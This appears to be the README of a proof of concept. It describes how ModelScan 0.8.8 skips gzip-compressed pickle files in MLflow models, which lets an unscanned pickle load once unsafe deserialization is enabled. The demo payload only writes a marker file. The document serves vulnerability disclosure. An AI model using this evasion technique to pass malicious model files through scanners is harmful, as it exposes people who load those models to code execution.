MLflow Compressed Pickle ModelScan Bypass PoC
This is a harmless proof-of-concept for an MLflow model-file scanner gap.
The MLmodel metadata points MLflow's python_function flavor at
python_model.pkl.gz and declares python_model_compression: gzip.
MLflow decompresses that file and passes it to cloudpickle.load() when
unsafe pickle deserialization is explicitly enabled.
ModelScan 0.8.8 does not inspect the compressed pickle because it only sees
the final .gz suffix, so the artifact is skipped and no issue is reported.
The payload is non-destructive. It only writes
mlflow_compressed_pickle_marker.txt containing
MLFLOW_COMPRESSED_PICKLE_BYPASS.
Reproduce
pip install -r requirements.txt
python verify_poc.py --model-dir .
Default MLflow loading blocks pickle deserialization. The verification script
then sets MLFLOW_ALLOW_PICKLE_DESERIALIZATION=true to demonstrate the unsafe
load path and marker creation.